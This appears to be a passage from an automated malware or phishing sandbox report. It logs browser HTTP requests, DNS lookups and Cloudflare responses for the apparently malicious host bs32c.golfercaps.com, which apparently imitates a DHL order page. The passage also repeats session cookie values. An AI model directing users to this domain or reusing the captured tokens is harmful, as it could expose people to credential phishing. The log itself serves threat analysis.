en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_radio_checked.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_radio_checked_focused.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_radio_empty.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_radio_empty_focused.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_not_checked_required.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_not_checked_required_focused.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/bg.jpg HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /vfd23ced/next.php HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /vfd23ced/next.php HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /vfd23ced/next.php HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: bs32c.golfercaps.com
          Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
          Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
          Source: global trafficDNS traffic detected: DNS query: www.dhl.com
          Source: unknownHTTP traffic detected: POST /report/v4?s=ulQbx3OJP6nXx0BIib9N6HdYIXGwmIVjIZHatCrEt7PC8cmZtHV4TtwWz6AtA1mmEEcTrKHtBQ1kcsFdjeun6Wt%2FDkRYhOOA5nVQOZ4E3G%2Bw4ikIhs847y6JkcwNyzGV8q8Zld6Suw%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 398Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 30 Dec 2024 21:42:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 30 Dec 2024 21:42:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:18 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JnLzx1uhbs1zVfdO7YDiKziZZtKFuUEsDlTjiLGec7xFsY%2FHc9zvQGnFPaeDDqn%2FzIpqkr6XewFIbhWboTM%2Bbhc2aSaglkGZz9un0d24vtjxtE2K%2B%2B3DNkoZgdqWvWALGjpfIKANpg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa532eae886423b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1672&rtt_var=639&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1455&delivery_rate=1696687&cwnd=226&unsent_bytes=0&cid=dc15152b387e017b&ts=319&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:19 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: GKPCO1vWVKfvGlgLGf1rnMctCw8fNlFuo+w=$taAx23otGW2RkTkCReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JZd6Ds8fU7zs2gVzRMbJN0V1OwvyoNdMiPJpT%2FE2XM46F6ciq9i%2BJ1wDCJmQ85IzSL2yu5JdtHOORZZ%2FmD%2FCHCz5bJtWspGCzHlcpvp16B23mE8C60CtOQ%2BhAqSigGpmvNE6QVpi5Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa532f13f8472b7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1835&min_rtt=1823&rtt_var=708&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1171&delivery_rate=1520041&cwnd=192&unsent_bytes=0&cid=2be8289ebeca565c&ts=138&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:21 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: shFKxnm+zObHx9Jf5BFiL6w+Z0iN/I12itg=$GaO0vXq1DKu1PnkKServer: cloudflareCF-RAY: 8fa533010fcf7d0b-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:23 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: ipE79ZCaC1Uh8plCsPiGmeJUWRYXXEzxHh4=$EtDwwsn0DhmRJ0iaServer: cloudflareCF-RAY: 8fa5330f3a41de96-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:32 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: Ru90kBt+IYS4TxosudS/4Gd0Lvh2zwHHHzE=$dCCESmwfjPFxrXcFServer: cloudflareCF-RAY: 8fa533420a5142e0-EWRalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:33 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 6xK1JYWZwMQ+tZ26z9JJbYF+geKVmPzAD4c=$tuCBFErIOCSNfODiReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mwsyptiqraF3M2NdgW%2BvlWVm8WkS3VZ65AlChGlg0GgEpuIK4M2Mo%2FGwlhOBjHc%2BWpbcUKfHC8klBvXayyEOS7yEa64jorXlX6QSXqczehN9JdAATtrijMXbykVwCeHT3ciCbHoqBQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa5334a1d7e439f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1587&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1171&delivery_rate=1781574&cwnd=241&unsent_bytes=0&cid=ae649ca2ec35a7e9&ts=164&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:40 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5TBW6q%2FO2fnTq5TtFKizhNozWyKrUEfMJjrvfiUDW7TkiE31zlSN53OaUAMo%2Bu%2BPkhTwKW8uBKPAcqdy6nrqvBY3Y0kq1WIWO61YVLzOSqWDHS95mxCeUygl0H1JwTaN9sZt5huC%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa533744eba4237-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1684&rtt_var=648&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2044&delivery_rate=1667618&cwnd=194&unsent_bytes=0&cid=959c4ecbf198d8d0&ts=193&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:40 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UmHR36VjHtjA%2BG6PxoQgIKlPhQKyn8GTKQB5d8GvwxJkVmMhhv3nsiqlZOWXe2axSX3zoSOijTAIfoPebcHn5ZCatUrEHRC%2BvVGJDn9aH82yRzN%2FL0cp9NXlf9G93k4HNrh1AhpoyQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa53374488cf3bb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1512&min_rtt=1509&rtt_var=572&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2039&delivery_rate=1901041&cwnd=82&unsent_bytes=0&cid=1f4a4a71402bf063&ts=265&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:40 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rjhReT7ejfZs24gnomwVNDIeeo%2B4VpuO%2FbjtXoEEIXUcZzCLzXOs5guOODF1relggcr5E3ApLTotfp2FudZjYZaXkpHXDSDZzU%2BU7N3eXP3FjV1OhJMG5sxNbfC531yVf7ECt%2BWZ%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa533744e394316-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1733&rtt_var=660&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2047&delivery_rate=1645070&cwnd=177&unsent_bytes=0&cid=3c0454632158cfff&ts=269&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:40 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hUSsHL2kkkEvw4nHPapYNdR%2B4Xw0c3tIU51L%2BpxIlwWzvnZrZ7%2BZ26IDlr7Zw%2FvzomGxKcnO%2BJXorK0BzO8kCUwgbYJjf3IYaz%2BqPEAOaiaZn8c5o3ynZ2A235JpTOfvaW9dvnVwlA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa533746aa8c47c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1676&rtt_var=631&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2052&delivery_rate=1730883&cwnd=210&unsent_bytes=0&cid=3c116a15858880ca&ts=278&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:40 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EylvB9lGo%2FcxxVQnYrQbERlYAfUk%2Bm5g%2BrsEEwEe8jDMn3y1jjpI5RXiYU8NYyYfCc%2BaUN5soHz%2FYyVsy9JPw1OxHkBh0mHstApV5HK4b7wepDEXmAucPlh5nfBviWUI6vaaLi99Lg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa533747c6f437f-EWRalt-svc: h3=":443"; ma=86400server-timing: 